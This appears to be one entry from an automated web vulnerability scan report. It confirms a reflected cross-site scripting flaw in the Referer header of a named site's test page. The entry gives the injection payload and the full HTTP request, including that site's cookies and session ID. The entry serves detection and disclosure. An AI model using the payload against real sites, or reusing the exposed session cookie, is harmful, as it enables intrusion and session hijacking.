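NO.7 Vulnerability URL: znd.dawan.cn/test.html
Attack details: The vulnerable location is the referer parameter of the GET method.
The payload is "><marquee><img src=x onerror=abcd(1)></marquee><"
abcd(1) was matched in the img[onerror] tag of the returned page, confirming that the vulnerability exists.
Request:
GET /test.html HTTP/1.1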
Host: znd.dawan.cn
X-Schema: http
Connection: keep-alive
Accept-Encoding: gzip, deflate
Referer: http://znd.dawan.cn/exception_management.html
Cookie: Hm_lvt_085fc38faf3a4fade22b53ddde0f1e04=1688573025,1689214010,1689231711,1689863473; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1686189576,1687223390; Hm_lpvt_085fc38faf3a4fade22b53ddde0f1e04=1690893532; displayPwdExpiredTip=true; ASP.NET_SessionId=fyrsta0231prxignhuz2kzwm;
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
referer: "><marquee><img src=x onerror=abcd(1)></marquee><"<br......